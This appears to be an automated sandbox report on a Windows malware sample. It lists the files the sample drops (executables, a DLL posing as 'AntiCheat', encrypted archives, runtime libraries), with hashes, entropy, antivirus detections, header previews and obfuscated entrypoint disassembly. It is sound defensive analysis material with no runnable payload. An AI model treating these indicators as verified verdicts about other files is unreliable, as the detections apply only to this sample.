                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........i.B...B...B......G...-...Z...-...-...K...A...B.......-...P...-...Q...-...C...-...C...-...C...RichB...................PE..L....=.K...........!.................e..........................................................................................(....P.......................`..T....................................................................................text...A........................... ..`.rdata...t.......v..................@..@.data....-... ......................@....rsrc........P......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\VZ7xFmeuPX.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):28536832
                                                                                                                                            Entropy (8bit):7.992354739176019
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:C62F27864C7A540CAFBD0BDA87D99468
                                                                                                                                            SHA1:0319BFA3515EC27856DC9F4C67CFDD2DDCFC05BC
                                                                                                                                            SHA-256:F95D061BAA45DE5E4ED52E70B9D7809148568D4E8D6390C35D9821998F19FA33
                                                                                                                                            SHA-512:AA2D3D0E60D4D822C5248DE4F445A79DE3F32D9793F776ADD3F0FC6210BC78E0AD87B81624345EBA492FA1E629965FB0AD5CFFA52312FEC866DD533BD72A2497
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...6.|f.................p....u......j...........@..........................................................................gN.T........(...........................................................................P..............................mWevv...^h.......................... ..`54Faht...|j.........................@..@lATry.........}.....................@...VCXJ....hIg......................... ..`3mVe....P....P......................@...aHRy....p....`... ... .............. ..`A2p9f....(.......0...@..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\Desktop\AntiCheat.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3614208
                                                                                                                                            Entropy (8bit):7.930424765337438
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:B181808A51B6A4D61039DFA7C9AFDD88
                                                                                                                                            SHA1:49CD8CFF761A370E4928A1FD8257ABF5C667BA99
                                                                                                                                            SHA-256:732C0F98CD19C14B3C8ADA1B19685CB63E2BE8F3B97F249BE0AA310FE7B2C95A
                                                                                                                                            SHA-512:FFD4306E5301B2DAADE5E4D7069BD0E2914D6BE2C5AED46758BA6CE2B2E39E9C6CD6315842A537CB110A36B17159299813716DBEC3D5FDA11D64DE6FA0F53BA2
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....N.e.........."!...#.Z..........?m,......p...............................@V...........@A..........................P.v....DM.P.....V..>....................U.H...................................P.U.@...............,............................text...JY.......................... ..`.rdata.......p......................@..@.data....$...p......................@....C......yQ.......................... ..`.(......|...........................@....!........6.......6................. ..`.reloc..H.....U.......6.............@..@.rsrc....>....V..@....6.............@..@................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\Desktop\ExuiKrnln_Win32.lib

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\VZ7xFmeuPX.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1407488
                                                                                                                                            Entropy (8bit):6.54521480570655
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:4F2B40A72F89837EE39B7AF2E33DD672
                                                                                                                                            SHA1:69346069BD65FD33D9097C13F782B749A23C44AF
                                                                                                                                            SHA-256:BB7BE0935D6FA554FC1DAF7DB4502C65A27FFAAF26639214BF7EF370F99B9CF3
                                                                                                                                            SHA-512:38A23DA435C3F065A2AD6C5166863A12486ABA361F3E758551E5CB44980D30B575AB184EF0F7675E634AB58257B25E2AE09EB57F79DD826A7080DFD63CEBEC44
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........C.............y.......y..4....y......!.......!.......!.........w.......g.............,.......,.......,.........c.....,.......Rich............................PE..L...A..d...........!...!.|...@............................................................@..........................N..@x...........P.......................@...... ...T...........................`-..@............................................text...-{.......|.................. ..`.rdata...P.......R..................@..@.data...._..........................@....rsrc........P......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\Desktop\ExuiKrnln_Win64.lib

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\VZ7xFmeuPX.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1873408
                                                                                                                                            Entropy (8bit):6.304741203959434
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:DBAF95ED9BF6B9FFA44BDF46043E20E7
                                                                                                                                            SHA1:4C08A8DEF960A9A391C0415D4C3D7C96E0CFB8A9
                                                                                                                                            SHA-256:D4BC06E86279869AF83C89728BB7A057DE640E9FF6BA0BA03804732A0EAE9A07
                                                                                                                                            SHA-512:6105EA4FF6A2B2D301D6796A2533CABE70B96C59F66B2D9A73AD79513BAEE5AEDF4FAE7B4C526EF81A5062D7450ADB934126A8879B5AD6BA41EF4C5DF5668AD1
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........g..............Z.L.....Z.N.{...Z.O.....n}......n}......n}.......~>......~..............c}......c}......c}B.......*.....c}......Rich....................PE..d......d.........." ...!.....L...............................................`............`..........................................O..@x...........`.......................P..x....q..p....................r..(....p..@...............H............................text...`........................... ..`.rdata..............................@..@.data...t...........................@....pdata..............................@..@_RDATA..\....P......................@..@.rsrc........`......................@..@.reloc..x....P......................@..B................................................................................................................................................................................

                                                                                                                                            C:\Users\user\Desktop\IAC.Base.dat

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):366039
                                                                                                                                            Entropy (8bit):7.995893300408624
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:4E96F78F67B2FB41E11C12004B65A2E2
                                                                                                                                            SHA1:6D7ED67A790C622FA06B3A76FF71FA370FC3CA7C
                                                                                                                                            SHA-256:7ECDA3837F0E2886C32F21C5A0883B16B62438357FD90BA913CA83EAA8F03B8C
                                                                                                                                            SHA-512:7FC3E578316B89B2E5BCDBB5BC78C902411FA198B23E3A143FEDDCC2451A742AD3555B01B9916AEE9D4CB38C40787A7BA6345C6F34B9AE1AA7CB032E15E566D7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:GZSKinsX-IAC........PE..L......`F..L$.SV.t..F..Q.G.....M.P...~...............]x.U.rsrc..E....PI..G.h..G..@]..Y.h..G..4]+.i.u..CE...P.....G..M..F..E..F....P.:........3... .E..x....M.U...D.d.D.HD%.cI$P.7z..'.....k......b.........g...BRX.....@.data...................U.......0....(........e.....j....%.................g..h.a.g+...m.w.gp.......b........*..z..+..r"... i...,...,......LbO.W:pl(./...(...:....Y"W.(....k.)..B9.."..1..o%........*.M..c....".9-X.#.c.[...6..q..).>p........5o$D..X...%!."y"V..v...%.w..Rf.....)(..............}._......:..>..L.J.w..........:.3...d@-..yOn.k4...7M.-k.m.........F[....+*....5}....e....+,.n.j.....=........7...d.U....&...<.~.N.#.B...F\...N.....P/.)2j..u-."H....!..q.7pI.[..=..p.8|...?..L.l&_..|7..[2...n5`...Rw.L..H..d..~..u.2..[.X...0$.a.._...#?. .1..6As...0~,..X-[.r6I.DF.$.cGL...r@...8A>..k..g...MW8..X....M........F0...~..".._.F..*.7...7a..h^...... ..'..e.......Y.....[-.l.R4AyY#V....A#...h.W{._...)Rx..7*..4U...F..S.$.

                                                                                                                                            C:\Users\user\Desktop\IAC.zip

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):786150
                                                                                                                                            Entropy (8bit):7.998932111949898
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:2B1F07F59B87B5C97734451040A05CCC
                                                                                                                                            SHA1:45ACCFE0552FB883793D8E18381117103E21D84A
                                                                                                                                            SHA-256:C329341F57124FB283C3DEB7677071DA0BE88994585D11C2A2CC634B65DF4EB6
                                                                                                                                            SHA-512:018601C10A6EFF54BD08D3FCD48DF72E6C6392C24A58346BF2B2D00CB4568B992F5BC1F2923BB0B179C09443FEEC34DCB687A19755C62C42E5B8DCE1845A9B78
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:PK...........TV.1.!%...K.. ...api-ms-win-crt-string-l1-1-0.dll..t.E..y. .....!..MH....~#....+..L....afB'.#.....!..." ..<...".....\...kXE..<.z.gzzF....s.=g;...U._}U]].L....#"=x.h.y.....i...N$.{..>M.#..n...(r........C...*..V.00;.`w.-....>......W.\.:{.^L.K.kEm1]X.-{D}..T..}..D...Q......+.mYO..G.(.)*7...cy-Q8..v...W{.q.[K,4..7.w.l.:.X....:E.-.6....F.?.J.XJ=H..$..~+/.Q~...1.....k..d..e"i.}......_Y&...._.W...y.#@.A).P.>.......V..c.t.$>%..k.#_NT.#UdMG...m..k.....yx..F.......iM....+.dry...../J..$.$q.Ns..b......l...zl.q}K....6..,.._.1c...H.&[.............Y.=....&.C[..i..}.H=.....O.j.{n....Q^..(....%..>.7"j.C.6lgA....#..,`.X...W....c....`58...{ .9Q...f........Z`....@9x....V..v`.....j....5 ..M'0,...*.:p.|.......`...^.{.I.-.#...'....+..p.....*..l`>....W....}.+...`.x...7A.V..d.+..k.>p...QX..pP.*.*......C..{z:........)...........4..l...ep.4j...P0..`9......6.l......i`!......O .........,....p...":.?....N......... ,..%..F.'X.^......@....<..c.~...-.i...&.R."...[ .=.

                                                                                                                                            C:\Users\user\Desktop\api-ms-win-crt-heap-l1-1-0.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13800
                                                                                                                                            Entropy (8bit):6.773855214164896
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:0651BCD9ACADAC1D50653BE35378A82C
                                                                                                                                            SHA1:5D1B2233C7ACB3915D33F7B29CC2F0CBF34EA1AD
                                                                                                                                            SHA-256:FCF66176B6F7AB86F98F38D5662F61FA61AD3F1E59740D8A1DF0E1072248CF6D
                                                                                                                                            SHA-512:1CE05989181FAA8D291BB0DF34BB4E93F2F576187CF2D0C5110988CE17E6A682D815297FCC9FD174BC1791713FB07B616ED952729923ABF8C06B8B8F6D71D82E
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..L...g.[............!......................... ...............................@............@.........................`................0...................%..............T............................................................................text...v........................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\Desktop\api-ms-win-crt-math-l1-1-0.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):23528
                                                                                                                                            Entropy (8bit):6.337582200826521
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:46AAECDB8D337980C82CB2714A985986
                                                                                                                                            SHA1:22104D2272B592A344DF5B575FCFF83CA0E4B161
                                                                                                                                            SHA-256:34457A002E90A590B516BBF58530CDDDBB618A46BB3E764E18167C44934917DC
                                                                                                                                            SHA-512:33C91058A693B82F1457D49BBA2E209A90B825927BE89E38523671AC16F4FEF208B98EFA980A3E11185BAA4DF6D7639D447BF30E19DC91B76F04EE61B6169BEE
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..L...|.LI...........!.........................@...............................`.......5....@.........................`....+...........P...............6...%..............T............................................................................text...7-.......................... ..`.data...@....@......................@....rsrc........P.......2..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\Desktop\api-ms-win-crt-runtime-l1-1-0.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):17896
                                                                                                                                            Entropy (8bit):6.539603838553321
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:90340AC74D22B9A67237EA52A4DC1C75
                                                                                                                                            SHA1:75D44B240AFD4198B0F3B7256A4A9533AD1BA73F
                                                                                                                                            SHA-256:FD48DA616F2D17054BCAB961239431D99C247586F96BAC69AAC5B704EA694352
                                                                                                                                            SHA-512:6F52AE85B4D9AB8516D72BB1662AC9CF602092FC61EA78BD85AF05047C70A0ADC5EDB67266032F12A86601C983015276F15A457935F5B6143DC80D335351E5EC
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..L..................!.........................0...............................P.......U....@.........................p................@............... ...%..............T............................................................................text...5........................... ..`.data...@....0......................@....rsrc........@......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\Desktop\api-ms-win-crt-stdio-l1-1-0.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):18920
                                                                                                                                            Entropy (8bit):6.55763736754846
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:85444893A6553A4DD26150A68FD373D8
                                                                                                                                            SHA1:AD9B46DA45366F13A22173B06E22A45A211E99EC
                                                                                                                                            SHA-256:65F2A93490C845833541DE1376D5BB65E6E864A1A9232F58F86A7A84408508C9
                                                                                                                                            SHA-512:AD56F71D0DC6D2DC5DD46EAA00247BD209403014648FB9C8F98937FC8E36FC85C0107365D2F6BA4F6D530F340278E0205D94BAFEBC78D10201E71DBB5D4C36D6
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..L....V2"...........!.........................0...............................P......!.....@.........................`...a............@...............$...%..............T............................................................................text............................... ..`.data...@....0......................@....rsrc........@....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\Desktop\api-ms-win-crt-string-l1-1-0.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):19432
                                                                                                                                            Entropy (8bit):6.449503304191337
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:841E4FF9BB531B52218392DB1D7CFBE4
                                                                                                                                            SHA1:5607C2A987436195F1E241A0B29E8FB1F734102F
                                                                                                                                            SHA-256:4DA31E582DC47D46132CC73AD34D5B87DDDD2338495CEB2772F7E103A9A32EBC
                                                                                                                                            SHA-512:93232073D95870043994C752318F9B319DB508FFF452E4AA0B8E42E66D13623803BE4537E1798DD05177B7427175D989C8E49A379FD932297E161D461BAE268B
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..L...3............!.........................0...............................P...........@.........................p................@...............&...%..............T............................................................................text...O........................... ..`.data...@....0......................@....rsrc........@......."..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\Desktop\concrt140.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):259952
                                                                                                                                            Entropy (8bit):6.707182662097913
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:B94CD71FCB75E0A3DE90060AEAA09254
                                                                                                                                            SHA1:05F59DE21E9FD58CA81FD3BA85DEA07D76B09AD9
                                                                                                                                            SHA-256:43B77564672E91D726099DD8400EF051FEB14E1F44343EC3F8804F4542B60BF1
                                                                                                                                            SHA-512:C4CB0220811FBB8842382CD04F9C9F03152A63A50A1B75563933C66B307180A18F3C9CE148F7AB984819061440EC008C19F5852850D968976619D71BEB3AA9D5
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_...>...>...>...L...>...F...>...B...>...>..W>...B...>...B...>...B...>...B...>...B}..>...B...>..Rich.>..........PE..L.....~.........."!...".0...x..............@............................................@A.............................K..@...........................pO.......+...<..T............................;..@...............8............................text...<........0.................. ..`.data....4...@...2...4..............@....idata...............f..............@..@.rsrc................x..............@..@.reloc...+.......,...|..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\Desktop\msvcp140.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):447344
                                                                                                                                            Entropy (8bit):6.694495749390536
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:37DCBBA718886E5C24703B1268CE10B9
                                                                                                                                            SHA1:441738A1EA802C266CB0A84789ACE62E40010335
                                                                                                                                            SHA-256:968BBD2A36B04CC5795C6FC99AFE85E4D294FF9C28032CE0E870463827181799
                                                                                                                                            SHA-512:00AB4CFE4B5BB989F2931CC8928982819A99DF027B118C731957FC84C58CC8D636687FF39CF90DAC313E3FE7C7738A4899FBA98EBAB5B6ED4CBFA372B0EB2561
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................y...................c.......................'..........`...........Rich............................PE..L...f.w.........."!...".....z......`........0.......................................`....@A........................`U......Hc..,.......................pO.......5...U..T............................T..@............`..@............................text............................... ..`.data....'...0......................@....idata.......`.......2..............@..@.rsrc................J..............@..@.reloc...5.......6...N..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\Desktop\msvcp140_atomic_wait.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):46448
                                                                                                                                            Entropy (8bit):6.852658958177468
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:66C66659AA6B04EF16FCF2B10C8C4426
                                                                                                                                            SHA1:4BB8DBEFCAC9E2AEC2E3B94166D7A0723477C5E7
                                                                                                                                            SHA-256:BCE2A12817F1300EE988053CD5CB3773592CF2B595BF887FEA68FC70DA9262A9
                                                                                                                                            SHA-512:66C2E04D4ECE29F6FD99FDE1F32FFBD7543CB6B7CE04283479FBFD358B5BBF8E3BDBD857C4D2B91080761931D4D4A67207B742B0104AD3ADF2D7B21F78C93396
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............s...s...s.f.r...s.......s...w...s...p...s...r..s...r...s...v...s...s...s......s...q...s.Rich..s.................PE..L......3.........."!...".J..........PE.......`............................... .......P....@A.........................S..D............................f..pO......\.......T...............................@............................................text....H.......J.................. ..`.data........`.......N..............@....idata...............P..............@..@.rsrc................Z..............@..@.reloc..\............`..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\Desktop\msvcp140_codecvt_ids.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):30064
                                                                                                                                            Entropy (8bit):6.983516487927955
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:A7052BB66FBF2E8E181A72A31F600C77
                                                                                                                                            SHA1:5B46D72DF9951E83F292A2F8D4A0781D71EBD304
                                                                                                                                            SHA-256:EFAAB1808AA3B3A65DD49FB98E53D541683643B28E8B1E9CF5570DAFDB35FEEE
                                                                                                                                            SHA-512:83A79F1610877D70796AEA5A198E9B294028DFFDBC255DBE7B505728FB992405374536120CD9F82890099245EA9D60EC11FBA1F0FBDC90EDD620DE370F89910D
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.[.Pq..Pq..Pq.F"p..Pq..(...Pq..Pp..Pq..,p..Pq..,u..Pq..,r..Pq..,t..Pq..,q..Pq..,...Pq..,s..Pq.Rich.Pq.................PE..L....`.;.........."!..."............@........0...............................p.......p....@A........................."../...p@..P....P...............&..pO...`..H.......T...........................H...@............@..h............................text............................... ..`.data........0......................@....idata..x....@......................@..@.rsrc........P......................@..@.reloc..H....`.......$..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\Desktop\vcruntime140.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):90480
                                                                                                                                            Entropy (8bit):6.945887440610348
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:81B11024A8ED0C9ADFD5FBF6916B133C
                                                                                                                                            SHA1:C87F446D9655BA2F6FDDD33014C75DC783941C33
                                                                                                                                            SHA-256:EB6A3A491EFCC911F9DFF457D42FED85C4C170139414470EA951B0DAFE352829
                                                                                                                                            SHA-512:E4B1C694CB028FA960D750FA6A202BC3A477673B097B2A9E0991219B9891B5F879AA13AA741F73ACD41EB23FEEE58E3DD6032821A23E9090ECD9CC2C3EC826A1
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..n..n..n...o..n..in..n..n...n...o...n...o...n...o..n...o..n...n..n...o..nRich..n................PE..L......~.........."!..."............0........................................P.......F....@A........................p........ .......0..................pO...@.......$..T............................#..@............ ...............................text............................... ..`.data...............................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                            Static File Info

                                                                                                                                            General

                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Entropy (8bit):7.9923547689942085
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                            File name:VZ7xFmeuPX.exe
                                                                                                                                            File size:28'536'832 bytes
                                                                                                                                            MD5:c7b9fad6691e715033dacd193d65f5bf
                                                                                                                                            SHA1:521b8c1116408f448dec1f407e58a48a8564779a
                                                                                                                                            SHA256:327722aa946d64bcf5d584723dc62e9c88f4b2d8801f5576100e6d77d7b212ac
                                                                                                                                            SHA512:1ca8a8171f8ff41982ebcb8f0bc62187acecfa1fda583b2600338590d6f7aca1cff9bdc3d72e3492e8b56033110a9acd98e68ae6ca22dc250debc7dae56d4a03
                                                                                                                                            SSDEEP:786432:llBZHNsb0WFBRACpAzaaJou/NQrz7G6eDr49Om:lbTY0WFPAtJr/mbGTvS
                                                                                                                                            TLSH:AC5733A6ABA4ED75FE8D423480170D7532F17E5268D84818F98E3E869573A632CFF413
                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...6.|f.................p....u.......j...........@........................................................................

                                                                                                                                            File Icon

                                                                                                                                            Icon Hash:134dd6869ad66d33

                                                                                                                                            Static PE Info

                                                                                                                                            General

                                                                                                                                            Entrypoint:0x2aaa0cf
                                                                                                                                            Entrypoint Section:dVek
                                                                                                                                            Digitally signed:false
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                            DLL Characteristics:
                                                                                                                                            Time Stamp:0x667CE036 [Thu Jun 27 03:44:54 2024 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:5
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:5
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:5
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:4ac0c05601cf959e3c469972ff432f43

                                                                                                                                            Entrypoint Preview

                                                                                                                                            Instruction
                                                                                                                                            push ebp
                                                                                                                                            call 00007F8AB8964EC2h
                                                                                                                                            inc ecx
                                                                                                                                            jmp ecx
                                                                                                                                            inc ecx
                                                                                                                                            pop esi
                                                                                                                                            dec eax
                                                                                                                                            lea esi, dword ptr [edx+eax*2-4C4C0D45h]
                                                                                                                                            dec eax
                                                                                                                                            arpl bp, bp
                                                                                                                                            inc esp
                                                                                                                                            movsx ebp, ax
                                                                                                                                            inc ecx
                                                                                                                                            bswap ebp
                                                                                                                                            dec esp
                                                                                                                                            add ecx, ebp
                                                                                                                                            call 00007F8AB8AD30E5h
                                                                                                                                            shl eax, cl
                                                                                                                                            lea edx, dword ptr [edx+edx*4-3C6A67F3h]
                                                                                                                                            neg dword ptr [esp+04h]
                                                                                                                                            mov dword ptr [esi+06h], eax
                                                                                                                                            add esi, 06h
                                                                                                                                            pop edx
                                                                                                                                            pop eax
                                                                                                                                            jmp edi
                                                                                                                                            dec cl
                                                                                                                                            add word ptr [esp+08h], cx
                                                                                                                                            not al
                                                                                                                                            sar dword ptr [esp+0Ah], FFFFFF9Dh
                                                                                                                                            sub al, 3Dh
                                                                                                                                            and dword ptr [esp+09h], ecx
                                                                                                                                            neg al
                                                                                                                                            xor ecx, ecx
